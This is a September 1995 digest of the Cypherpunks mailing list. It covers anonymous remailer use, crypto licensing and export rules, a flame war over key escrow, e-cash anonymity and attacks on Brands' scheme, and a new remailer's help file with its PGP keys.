Key fingerprint =  A7 97 70 0F E2 5B 95 7C  DB 7C 2B BF 0F E1 69 1D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan Pugh" <Alan Pugh@MAILSRV2.PCY.MCI.NET>
Date: Sun, 10 Sep 95 02:14:20 PDT
To: cypherpunks@toad.com
Subject: remailers
Message-ID: <01HV3L6O9GWI8ZH626@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


where can i find a good 'how to' faq on anonymous remailers?

i've looked around and found several documents that tell me what they are, 
but no good information on how to use the various remailers.

pointers are appreciated.
          *********************************************
          *          / Only God can see the whole     *
          *  O[%\%\%{<>===========================-   *
          *          \ Mandlebrot Set at Once!        *
          * amp                                       *
          * <0003701548@mcimail.com>                  *
          * <alan.pugh@internetmci.com>               *
          *********************************************
Key fingerprint =  A7 97 70 0F E2 5B 95 7C  DB 7C 2B BF 0F E1 69 1D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Sun, 10 Sep 95 07:52:10 PDT
To: cypherpunks@toad.com
Subject: RSA lcensing costs?
Message-ID: <199509101443.HAA04907@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam, 

I called RSA last week to get information on licensing Diffie-Hellmann
for an videoconferencing application.  They said that "They provide
the BSAFE development toolkit, but don't license the technology" and
gave me the number of PKP to license the technology itself.  I called
a Mr. Fougmer at PKP, (408 735-5893), his message says that he'll be
out of town until the 18th of September, and if you want to leave a
message, call back after that date.

Now, I could be completely confused, it wouldn't be the first (or
even the 100th) time.  If you can get a standard license by using
the BSAFE toolkit, and they had a standard price for that, well,
I didn't give Linda De Los Reyes at RSA (415 595-8782) a chance
to tell me that.

thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-8624




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Sun, 10 Sep 95 08:12:45 PDT
To: cypherpunks@toad.com
Subject: 64 bit crypto
Message-ID: <199509101504.IAA04932@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



Say that we wanted to use 80 bit RC4 for our crypto application, but we were
only allowed to use 64 bit crypto because we lived in some police state that
enforced its wishes.   Couldn't we modify RC4 easily to provide the same
security against brute-force attacks by just running the key-setup phase
65536 times instead of just once?  That would slow down the key-setup (on
my machine) from 50,000 per second to just over 1 second, but so what?  It
takes ATT more than 1 second to set up a long distance call, I can wait
another second to start the conversation.

If our breaking of 40 bit RC4 was a one, then this 64 bit RC4-modified would
be a 109,951,162,776, well beyond possibilities that I can imagine.  You might
say that you could save all 2^64 key tables, but that is a huge amount of data,
millions of terabyte-capacity tapes.

In the GAK proceedings, I have never heard of any limitation on the algorithm,
just that it be public and 64 bits or less.  And, of course, have GAK.  Of
course, it wouldn't surprise me for this kind of technical fix to be
immediately outlawed by the aforementioned police state.


thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-8624




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 10 Sep 95 09:43:35 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks Purity Test
Message-ID: <ac785d1601021004ddb4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



It seems that none of us are "pure enough" for Anonymous.

In the real world, and in the world of crypto experts, programmers, and
legal folks, people have real jobs. Sometimes with Microsoft, sometimes
with AT&T, sometimes with the Justice Department.

To exclude them from our discussions because they are not pure enough and
have not done as Anonymous has (who may actually be working for anyone, of
course), is self-defeating. By working for Microsfoft, Justice, or TPC,
they can probably do more for "the cause" (in its many dimensions and
facets) than some warez-junkie living with his parents can.

Specifically,

At 2:45 AM 9/10/95, Anonymous wrote:

>wei dai patents algorithms - for microsoft!!!!. that should
>fucking help us a lot. whos he gonna sue first?

Wei Dai's work is impressive...I'm not surprised Microsoft hired him for
the summer. Patents are a way of life. They may not always be, and
different people have different views on them, but meaningless insults like
this are a waste of our time.

>according to sci.crypt mat blaze can prove that clipper has no back
>door. right. that sure helps us. david sternlights new hero.

If Anonymous believes this claim by Sternlight, he didn't read the rest of
the discussion and he knows as much about crypto as Sternlight does. Matt
Blaze made a much more finely-nuanced point about this (I wasn't at the
Crypto meeting, but read his comments in sci.crypt, and they directly
dispute this point by Anonymous.)


>pat farrel signs up with the nsa to make the key escrow rules easier
>for us morons to understand. hey thanks. maybe theyll give you a
>nicer room in the concentration kamp.

Pat Farrell and several other members of our list attended the NIST key
escrow meeting. I would have also if I lived near D.C. Is silence the only
acceptable behavior at such meetings? Perhaps Anonymous feels that even
_attending_ such a meeting is disgraceful? Most of us disagree.

>
>a whole shitload of socalled cypherpunks jumping over each other to help and
>defend him.

They "defended" him in the sense that they questioned the motives (and
perhaps the emotional age) of Mr. Anonymous. We on this list have had a
long interest in key escrow, dating back to the first weeks of this list's
existence, and 6 months prior to the public disclosure of Clipper. Much
discussion of key escrow in various forms (Clipper, SKE, CKE, GAK) has
occurred, and even lists of changes/improvements have been made.


>brian davis trys to convinice us that key escrow isnt so bad (who signs
>your paycheck davie?????)
>

I recall Brian Davis asking a well-formed question about whether our
objections to key escrow would be lessened under various circumstances. A
perfectly reasonable thing to do. Several of us responded. What this list
is for.

>that guy from rand corp tells us words of wisdom from robert morris the nsa guy
>as if we should write them down and pray three times a day to them.
>

??? This one escapes me. Robert Morris Sr. has written many interesting
things. That he worked for, or still works for, the NSA is no reason to
ignore what he has said.

Anonymous would probably be thrown into an apoplexy were he to learn that
more than one current Cypherpunk actually worked for the NSA.

>carl elison designs key escrow for tis and acts like hes one of us.
>

He _is_ one of us. His work on commercial key escrow (CKE) is not
inherently bad. After all, there are many legitimate reasons people and
corporations would _choose_ (emphasis on "choose") to split keys, store
them with trusted agents, etc. CKE, if done right, may be the way many of
us protect ourselves, from loss of keys in various circumstances. Even
protect ourselves from having to give keys to others (imagine offshore CKE
depositories which have instructions on under what circumstances they will
comply....).

I ask Anonymou, is it better that an active researcher and developer of CKE
be on this list, or that we cast him out (as if we could) and continue in
ignorance?

>bruce schneier is copyrighting crypt programs and
>threatining to sue people who use it.
>

Like it or not, copyrights and patents are the way things are now being
done. It sometimes takes having a patent portfolio before one can "trade"
with those having other patents. Longterm, this will likely change (crypto
anarchy and all that), but for now....

I'm not going to defend software patents, but insults like this, for
someone who has worked so hard on crypto education, are uncalled for.


>even phil zimmerman is selling the rights to pgp. what about all the
>people who contributed code (like me). not a dime for us because phil is
>famous
>and your not alowed to say anythingn bad about him. sorry i forgot phil is god.
>no one dares to complain. ask phil about me and when i asked about sharing
>profits from the code i conrtibuted. also about the deal with
>r.f...

Now we know that Anonymous is actually a plant from the One Worlders!
Insulting Saint Phil is too much.


>lets get back to being punks. fuck these traitors. do crypto and fuck the nsa.
>

Articulate words. Or, as Anonymous woud put it:


"fuck this noyze. get back to hacking commodore 64 warez. crypto rulez, d00d!"


Amazing what the cloak of Anonymity brings out in people. Almost enough for
me to start to believe the doubters of anonymity, the skeptics. But, with
good filtering (and especially with positive reputation filtering), no big
deal to send Anonymous to the oblivion he so richly deserves.

I've written a lot in my time on this list, and no doubt Anonymous will
find many items he thinks prove I am working for the NSA, or Chobetsu, or
am an agent for the Beast. So be it.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 10 Sep 95 07:14:46 PDT
To: cypherpunks@toad.com
Subject: PGP in UK and GAK
Message-ID: <199509101414.KAA09600@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by anonymous-remailer@shell.portal.com () on 
Sun, 10 Sep  2:8  AM

[Snip]

>The person who told me about this also said something 
>about a  Department of Trade & Industry paper which 
>mentioned that the British  Government was going to 
>insist on key escrow for encryption.
>
>Anyone else in the UK heard anything about this?


   Picking up the possible mandated use of key escrow in the
   UK:

   There was chat at the NIST key escrow meeting that low-bit
   key escrow may be the global policy in the works among
   governments. With a blanket outlawing of all non-escrowed
   systems. And, that US key escrow and 64-bit export policy
   is a harbinger of domestic regulation.

   A fed at the B-2 breakout session imperiously barked the
   mantra chanted by several feds at the general meeting, "64-
   bit encryption is what industry asked for, why are you now
   complaining."

   To the counter-question, "what industry are you referring
   to?" the answer was always just "industry."

   The USG's latest key escrow policy, the NIST meetings and
   the Intellectual Cryptography Insitute's conference "Global
   Challenges" posted here may be the surfacing of a well-
   orchestrated government and "industry" collusion on this
   issue. Note the common ever-present attendees of both NIST
   and the ICI meetings.

   Certainly, some "industry" spokespersons like "Daughter of
   Clipper" Denning presume by their tone of writing that key
   escrow is on its way to supremacy, with only quibbling left
   on the criteria for acceptably "competitive" variations.

   The NIST handouts of industry players seem to bear this out
   as well, even as some join the public kibitzing. Perhaps
   their raz, and that of BSA, is just a diverting smokescreen
   to induce complacency -- or squeaking wheels to get USG
   attention for sweetheart contracts.

   Maybe they've already met privately with USG reps to get
   rewarded with a piece of the PGP/non-escrow clamp-down biz
   -- more venerable suckling of national security kabooty as
   advised by smart-varmints like ex-NSA Mr. Stewart
   Abercrombie Baker, Every-meet-attending-Esq.

   I wonder if Mrs. Denning and Mr. Baker are advising their
   sweating crypto clients, "if you can't beat 'em, join 'em,
   the international escrow train is leaving the station,
   better get on before it's too late."

   While fretting of derailment by hackers, or worse, by
   international security agencies paranoid of gov-biz
   complicity to take over the "if you knew what I knew"
   crypto-protected cornucopia.

   Wonder who's really engineering this GAK Limited runaway?

   Does anybody know David Kahn well enough to ask what he's
   finding as NSA Visiting Historian -- in the archives and in
   the job-insecure-spook resumes heat-seeking crypto fires?














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 10 Sep 95 08:52:33 PDT
To: Anonymous <anon-remailer@utopia.hacktic.nl>
Subject: Re: If this thread didn't start with a flame then I'm ...
In-Reply-To: <199509100245.EAA09943@utopia.hacktic.nl>
Message-ID: <Pine.D-G.3.91.950910115011.8871C-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Sep 1995, Anonymous wrote:

> 
> i know this is unpopular but i wish someone would respond the the points
> rather than flaming me. pat farrel is the only one of you with the balz
> to try to defend himself insead of attacking me. and you attack me for
> being anon. i love it. cypherpunks yea right.
> ... 
> 
> brian davis trys to convinice us that key escrow isnt so bad (who signs your paycheck davie?????)
> 
> an116512@anon.penet.fi
> 
An:

You flamed me several months ago, essentially for being a govt flunky in 
the boonies.  You didn't respond to my last post on the topic ...

Many of us (apparently) have trouble with flames orginating from "the 
great and powerful Oz" who may be, in fact, a nonacheiver hiding behind a 
curtain.  I guess we need Toto to pull away your curtain of privacy!

If you don't diverse viewpoints, either persuade this list's owner to 
change his charter or start your own list.  Then maybe *I'll* start 
posting anonymously.

You also misread the purpose of my post re MKE.  The purpose was for me 
to get a sense whether some number of Cypherpunks might agree to some 
form of MKE (i.e. would some kind of protection that the government might 
accept, also be acceptable to most/some on the list).  I received a 
number of thoughtful and thought provoking replies.  I was expecting your 
flame, but I see you decided to use your blunderbus rater than a rifle.

And you are, of course, correct.  Make no attempt to understand your 
enemy.  Stand your ground regardless.  No tactical retreats, no overall 
strategy.

Was this from Sun Tzu?

EBD

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame way! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 10 Sep 95 12:13:27 PDT
To: cypherpunks@toad.com
Subject: Re:  Brand e-cash implementation?
Message-ID: <199509101912.MAA07700@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Brands has a web page at <URL:http://www.cwi.nl/~brands>.  I don't know
of any implementations of his technology.  The last time I heard from him
was early this year and at that time he apparently was still looking for
backers.

BTW he has a new paper out as of July 95, available above, which
discusses some problems and attacks on some earlier papers.  He had
proposed a notion called "secret key certificates" in which some
problems have been found.  Basically a secret key certificate is just
like a public key certificate (a signature by someone on a public key
as in PGP) except that realistic-looking but ultimately worthless
secret key certificates can be faked up (simulated) by anyone.  No one
can distinguish a fake secret key certificate from a real one.
However, they are worthless because the faking process requires you to
choose a random public key, and you can't figure out what the secret
key is.

Brands has (re)expressed his digital cash technology in terms of these
secret key certificates.  But Berry Schoenmakers of CWI has shown a way
in which a faked-up secret key certificate can be used to spend a coin
which was never withdrawn.  However, to do so, you have to go through
the withdrawal protocol in a particular incorrect way.  You force the
bank to act as an "oracle" for a certain discrete log problem when you
do the withdrawal.  The data you get from the incorrect withdrawal
protocol allows you to spend the fake coin.

So this is not actually a dangerous attack, because you in effect have to
withdraw a coin in order to spend the fake one.  You can't make any money
from it.  Still it was not anticipated and that is a bit worrisome.  I'm
not sure why Brands' various proofs of correctness (which are one of the
big selling points of his technology) did not anticipate this attack.

(In effect this is a different form of a blind signature than what
Brands planned for, since you withdraw one thing and get another.  I was
thinking Brands should write this up under the title "Unanticipated
Blinding for Signatures", a pun on Chaum's "Blinding for Unanticipated
Signatures", one of his credential papers.)

Brands has a workaround to prevent this attack, but it hurts the
provability of his scheme.  "A rigorous prove [sic] of the effectiveness
of the measure may be hard to provide, though, since one must hereto
prove that the CA cannot be used as an oracle to perform the
cryptographic action in the showing protocol with respect to simulated
public keys."  So this may be a setback in Brands' attempts to get his
thesis finished and accepted.

As for the question of whether any digital cash scheme offers "true"
anonymity, I think you have to be more specific.  Virtually all cash
advocates will claim that they can offer this.  In the debate I had
earlier with Lucky Green I argued that Chaum's ecash does offer a certain
kind of anonymity.  The extent to which it does not is largely not
technical but a product of not allowing anonymous bank accounts.  With
anonymous accounts Chaum's technology offers as much anonymity as any
system that I have studied.

There is one technical problem with Chaum's ecash which Lucky mentioned,
but I believe it applies to all systems.  That is that the spender of the
cash can "mark" it or at least recognize it when it is later deposited.
If the spender wanted to attack the receiver of the money and it is
deposited non-anonymously then this will be a problem.

However, as we discussed here several months ago, Chaum's paper
"Transferred Cash Grows in Size" from a recent Crypto proceedings shows
that by colluding with the bank a payor of cash can recognize it at any
later stage of the payment chain.  So this kind of anonymity is very hard
to achieve.  Chaum's paper applied to off-line cash, though, so perhaps
an online system could do it.  But you'd have to blind the coins twice,
once when they pass from bank to payor and once when they go from payor
to payee, and I don't see how to do this.

Hal Finney




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 10 Sep 95 09:34:06 PDT
To: cypherpunks@toad.com
Subject: Re: Sigh Re: not a flame please read and think about this
In-Reply-To: <199509092006.NAA05181@jobe.shell.portal.com>
Message-ID: <199509101633.MAA11214@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



anonymous-imbecile@shell.portal.com writes, among other things:
> Then shut up.

Its wonderful to see lots of anonymous remailers, but sometimes one
wonders at the people that use them. I can understand, though, why
many people don't have the cojones to make themselves look like
hydrocephalic jerks in public.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rwm132@psu.edu (Ryan Matlock)
Date: Sun, 10 Sep 95 09:50:26 PDT
To: Cypherpunks@toad.com
Subject: mailing list
Message-ID: <199509101650.MAA46410@r02n06.cac.psu.edu>
MIME-Version: 1.0
Content-Type: text/plain


can you put me and Catch 22 on your mailing list?  got any good philes philes?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 10 Sep 95 10:45:55 PDT
To: Joel McNamara <joelm@eskimo.com>
Subject: Re: Bizdos citizenship?
In-Reply-To: <199509100434.VAA10595@mail.eskimo.com>
Message-ID: <199509101745.NAA11319@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Joel McNamara writes:
> In correspondence with someone outside the US regarding ITAR
> regulations, the remark was made that Jim Bizdos was Greek and not a
> U.S. citizen.  Is this statement in the same class as an Elvis
> sighting?  Or if it is true, what impact would ITAR have on foreign
> nationals working for a US company involved with export restricted crypto?

Yes, its true. Its meaningless because he's a U.S. Person, and thats
all that counts for the ITARs.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 10 Sep 95 10:47:35 PDT
To: cypherpunks@toad.com
Subject: Re: not a flame please read and think about this
In-Reply-To: <199509100245.EAA09943@utopia.hacktic.nl>
Message-ID: <199509101747.NAA11327@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
> i know this is unpopular but i wish someone would respond the the points
> rather than flaming me.

I'm afraid that you're basically an anonymous jerk and that I
personally have no interest in responding to you. Post under your own
name if you want more than bile.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: damion.furi@the-matrix.com (DAMION FURI)
Date: Sun, 10 Sep 95 13:11:24 PDT
To: cypherpunks@toad.com
Subject: not a flame please re
In-Reply-To: <8B0D11D.000504E7BF.uuout@the-matrix.com>
Message-ID: <8B0D375.000504E8F1.uuout@the-matrix.com>
MIME-Version: 1.0
Content-Type: text/plain



A|i know this is unpopular but i wish someone would respond the the points

        You're going out of your way to be an asshole and you're
        surprised that you're being attacked?

        If you don't want to be flamed, turn off the flamethrower,
        shut down the bulldozer, and use a reasonable tone.

 |rather than flaming me. pat farrel is the only one of you with the balz
 |to try to defend himself insead of attacking me. and you attack me for
 |being anon. i love it. cypherpunks yea right.

        Anonymous doesn't mean anything except that you don't have
        the "balz" to stand up for the beliefs you're espousing.

A|wei dai patents algorithms - for microsoft!!!!. that should
 |fucking help us a lot. whos he gonna sue first?

        If the patents aren't valid, they won't stick.  What are
        you bitching about?

A|according to sci.crypt mat blaze can prove that clipper has no back
 |door. right. that sure helps us. david sternlights new hero.

        Maybe it doesn't.  Not that it matters.  The only reasonable
        working assumption for Clipper (or anything like it) is that
        it _does_ have at least one back door and that it will be
        abused.  What's new about this?  Again, what are you bitching
        about?  Sternlight's an idiot, use your head.

A|pat farrel signs up with the nsa to make the key escrow rules easier
 |for us morons to understand. hey thanks. maybe theyll give you a
 |nicer room in the concentration kamp.

        <shrug>  I'm not going to participate in an escrow no
        matter how easily the rules are understood.  I'm not
        going to participate for any reason.  But I can feel
        that way without jumping down Farrell's throat over
        it.  After all, he's not my spokesman.

A|a whole shitload of socalled cypherpunks jumping over each other to help and
 |defend him.

        That's not what I saw.  I saw a whole shitload of cypherpunks
        jumping over each other attacking you, not defending him.

A|bruce schneier is copyrighting crypt programs and
 |threatining to sue people who use it.

        So?  His programs, his rules.  If you used one of my programs
        without a license, I'd sue you, too.

A|even phil zimmerman is selling the rights to pgp. what about all the people w
 | contributed code (like me). not a dime for us because phil is famous
 |and your not alowed to say anythingn bad about him. sorry i forgot phil is go
 |no one dares to complain. ask phil about me and when i asked about sharing
 |profits from the code i conrtibuted. also about the deal with
 |r.f...

        You weren't expecting money when you contributed code.  What
        changed?

A|lets get back to being punks. fuck these traitors. do crypto and fuck the nsa

        Random defiance won't get you anywhere you want to be.


   :----------:----------:----------:----------:----------:----------:-----
   : furi@the-matrix.com |   pgp-public-key@demon.co.uk   | LIVE LION ALERT
   : 2.6.2 1024/C1225CE1 | 38 11 7C 59 FB F3 7C C0  F7 E9 67 1F AF B8 2D 94
                 PGP: When it's none of their damned business.
---
  SPEED 2.00 #2640  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David C. Lambert" <dcl@panix.com>
Date: Sun, 10 Sep 95 12:08:56 PDT
To: cypherpunks@toad.com
Subject: Precipice remailer open for business
Message-ID: <199509101908.PAA26842@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



The Precipice Remailer is now open for business!

Below, I have included the remailer-help file.

You can get this file by sending a message to:

  mixmaster@mix.precipice.com

with a subject of "remailer-help".

- David C. Lambert
  dcl@panix.com
  dcl@mix.precipice.com

================================================================================

This remailer supports both type II (Mixmaster) and type I (Ghio)
cypherpunks messages.  Help files for both are below.

Both mailers have a 5 message reordering pool, with zero default latency.
Posting to Usenet is not supported.

I consider the following to be inappropriate use of this anonymous remailer,
and will take steps to prevent anyone from doing any of the following:

   - Sending messages intended primarily to be harassing or annoying
     (this includes spam/velveeta);
   - Use of the remailer for any illegal purpose
     (death threats, kiddie porn, etc).

Don't ruin this remailer for everyone by doing something stupid
and/or illegal, and I won't be forced to assist the authorities in
crushing you like an insect.

If you don't want to receive anonymous mail, send me a message, and I will
add your email address to the block list.

You can get a list of statistics on remailer usage by sending mail to
mixmaster@mix.precipice.com with Subject: remailer-stats

Have a nice day.

- David C. Lambert
  dcl@mix.precipice.com


The type I PGP key is:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAypWYAAAEEAMUFk7ue4Isn2u1FMtYhJBLbSmxSgUaBgs8EJNZZYExcfTCr
V+m8o2N3pYxzbjPRAZ/pv0N1Tg93Kh17/RSzEjR/y91aaBjePv36VYKwCS8KeeX+
4LDyboic5EVkiDt1eu2cI6LIrl9w7Fo1/3YzNvsMVJ1ki/v5Ie5wAysW17oJAAUR
tBttaXhtYXN0ZXJAbWl4LnByZWNpcGljZS5jb20=
=hVLK
-----END PGP PUBLIC KEY BLOCK-----

The Mixmaster key is:

precipice mixmaster@mix.precipice.com 05fef5887ac55dfe7379d0ef4a2a0c4b 2.0.1

-----Begin Mix Key-----
05fef5887ac55dfe7379d0ef4a2a0c4b
258
AATIdI/+dQ3rsvREcdYsnJkd+zQKCkPerZsyDXmX
NaYjUTwMhiHHjl/e7Zqx/mUAUQnifQfg4KpHvBGL
a6rQUTQjRhhz8sOvynyJci4NTm8DFDjYdTpvnbjp
YPu7xNhSfg7fmqXuqCan1M/AmpU1r6sF6M6gA0W4
EpOqFaJo7g32xQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----


==============================
TYPE II INFO (Mixmaster 2.0.1)
==============================
This is a Mixmaster remailer. It provides an extremely high level of security.
To use it, you must have a client program to produce the messages.
This software is available from ftp://nately.ucsd.edu/pub/remail
Read the README file for instructions. This file is export restricted,
so it can not be retrieved directly.

Some information can be sent to you by the remailer by including the
following commands (one per message) in the subject line of mail to the
remailer.

  remailer-help		This file.

  remailer-stats	Usage statistics for the last 24 hours.

  remailer-key		The mixmaster key file for this remailer.


A list of remailers is available from ftp://nately.ucsd.edu/pub/remail,
http://nately.ucsd.edu/~loki/, and will be posted periodically to
alt.privacy.anon-server and other privacy related groups.


======================
TYPE 1 INFO (Ghio 2.0)
======================

I have an automated mail handling program installed here which will take
any message with the proper headers and automatically re-send it anonymously.
You can use this by sending a message to mixmaster@mix.precipice.com, with the
header Anon-To: containing the address that you want to send anonymously to.
(Only one recipient address is permitted.)  If you can't add headers to your
mail, you can place two colons on the first line of your message, followed
by the Anon-To line.  Follow that with a blank line, and then begin your
message.  For Example:

> From: joe@site.com
> To: mixmaster@mix.precipice.com
> Subject: Anonymous Mail
>
> ::
> Anon-To: beth@univ.edu
>
> This is some anonymous mail.

The above would be delivered to beth@univ.edu anonymously.  All headers in
the original message are removed, with the exception of the Subject (and
Content-Type, if present).  She would not know that it came from Joe, nor
would she be able to reply to the message.

However, if Beth suspected that Joe had sent the message, she could compare
the time that the message was received with the times that Joe was logged
in.  However, this problem can be avoided by instructing the remailer to
delay the message, by using the Latent-Time header:

> From: joe@site.com
> To: mixmaster@mix.precipice.com
> Subject: Anonymous Mail
>
> ::
> Anon-To: beth@univ.edu
> Latent-Time: +1:00
>
> This is some anonymous mail.

The above message would be delayed one hour from when it is sent.  It is also
possible to create a random delay by adding an r to the time (ie +1:00r),
which would have the message be delivered at a random time, but not more
than an hour.

Another problem is that some mailers automatically insert a signature file.
Of course, this usually contains the senders email address, and so would
reveal their identity.  The remailer software can be instructed to remove
a signature file with the header "Cutmarks".  Any line beginning with the
same text at in the cutmarks header, and any lines following it will be
removed.

> From: sender@origin.com
> To: mixmaster@mix.precipice.com
> Subject: Anonymous Mail
>
> ::
> Anon-To: recipient@destination.com
> Cutmarks: --
>
> This line of text will be in the anonymous message.
> --
> This line of text will not be in the anonymous message.

You can add additional headers to the output message by preceeding them
with ##

> From: chris@nifty.org
> To: mixmaster@mix.precipice.com
> Subject: Nifty Anon Msg
>
> ::
> Anon-To: andrew@hell.edu
>
> ##
> Reply-To: acs-314159@chop.ucsd.edu
>
> A Message with a reply address.

By separating messages with cutmarks, you can send more than one message
at once:

> From: me@mysite
> To: mixmaster@mix.precipice.com
> Subject: message 1
>
> ::
> Anon-To: recipient1@site1.org
> Cutmarks: --
> 
> Message one.
> --
> ::
> Anon-To: recipient2@site2.org
> 
> ##
> Subject: message 2
> 
> Message two.

The two messages will be delivered separately.

For added security, you can encrypt your messages to the remailer with PGP.
The remailer software will decrypt the message and send it on.  Here is the
remailer's public key:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAypWYAAAEEAMUFk7ue4Isn2u1FMtYhJBLbSmxSgUaBgs8EJNZZYExcfTCr
V+m8o2N3pYxzbjPRAZ/pv0N1Tg93Kh17/RSzEjR/y91aaBjePv36VYKwCS8KeeX+
4LDyboic5EVkiDt1eu2cI6LIrl9w7Fo1/3YzNvsMVJ1ki/v5Ie5wAysW17oJAAUR
tBttaXhtYXN0ZXJAbWl4LnByZWNpcGljZS5jb20=
=hVLK
-----END PGP PUBLIC KEY BLOCK-----

To utilize this feature, create a message with two colons on the first line,
then the Anon-To line, then any other headers, such as cutmarks or latency,
then a blank line, and then the message.  Encrypt this with the remailer's
public key.  Then send it to the remailer, adding the header "Encrypted: PGP".
If you forget this, the remailer won't know that it needs to be decrypted.
Also be sure to use the -t option with PGP, or the linefeeds might not be
handled properly.

> To: mixmaster@mix.precipice.com
> From: me@mysite.org
>
> ::
> Encrypted: PGP
>
> -----BEGIN PGP MESSAGE-----
> Version: 2.6.2
>
> hIkCuMeAjnwmCTUBA+dfWcFk/fLRpm4ZM7A23iONxkOGDL6D0FyRi/r0P8+pH2gf
> HAi4+1BHUhXDCW2LfLfay5JwHBNMtcdbgXiQVXIm0cHM0zgf9hBroIM9W+B2Z07i
> 6UN3BDhiTSJBCTZUGQ7DrkltbgoyRhNTgrzQRR8FSQQXSo/cf4po0vCezKYAAABP
> smG6rgPhdtWlynKSZR6Gd2W3S/5pa+Qd+OD2nN1TWepINgjXVHrCt0kLOY6nVFNQ
> U7lPLDihXw/+PPJclxwvUeCSygmP+peB1lPrhSiAVA==
> =da+F
> -----END PGP MESSAGE-----

Any unencrypted text after the PGP message is also remailed.  This is to
allow sending to someone who is anonymous.  If you create a PGP-encrypted
message to yourself via my remailer, and then you give it to someone, they
can send you a message by sending the encrypted message to the remailer.
The remailer will then decrypt it and send it to you.  The message gets
anonymized in the process, so the sender will need to include a return
address if he wants a reply.

Messages sent this way can be encrypted using the Encrypt-Key: feature.
Any text following a line beginning with ** will be encrypted with this
key.  For example, if you put in your PGP message:

> ::
> Anon-To: you@yourhost.org
> Encrypt-Key: your_password
> 
> **

The appended message after the ** will be encrypted with the key 
"your_password", using PGP's conventional encryption option.  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Sun, 10 Sep 95 12:23:05 PDT
To: cypherpunks@toad.com
Subject: Re: not a flame please read and think about this
In-Reply-To: <199509100245.EAA09943@utopia.hacktic.nl>
Message-ID: <9509101521.ZM13875@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain


Hm. Time for agents. But here's a fairly simple test:
if there are no uppercase letters in the body of the message, and no
apostrophes either, it's likely from "anonymous", our favorite Thomas.

After all, the other reputable nyms at least *sign* their stuff, don't
they? [and PGP generally seems to use upper-case when it writes
signatures]

frodo =)
--
Richard Martin
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sun, 10 Sep 95 15:32:12 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: question about reputation
Message-ID: <Pine.SUN.3.91.950910145610.8377A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


In an economy based on positive reputations, how does one acquire a 
reputation capital?  One way may be to initially perform services at a 
price below cost, but this has some problems.

For example, Alice starts a anonymous consulting service, and announces 
that she will answer the first ten queries for free.  Upon hearing this, 
Mallet immediately starts another consulting service, and announces the 
same offer.  At this point Mallet can simply forward his customers' 
queries to Alice and Alice's answers back to his customers.  Thus, he gains 
reputation at no cost.

On the other hand, this "man-in-the-middle" attack can also work against
conventional True Name based services, but perhaps with less effect.  Has
anyone ever heard of this being done? 

Is there a better way to acquire a good reputation?

Wei Dai




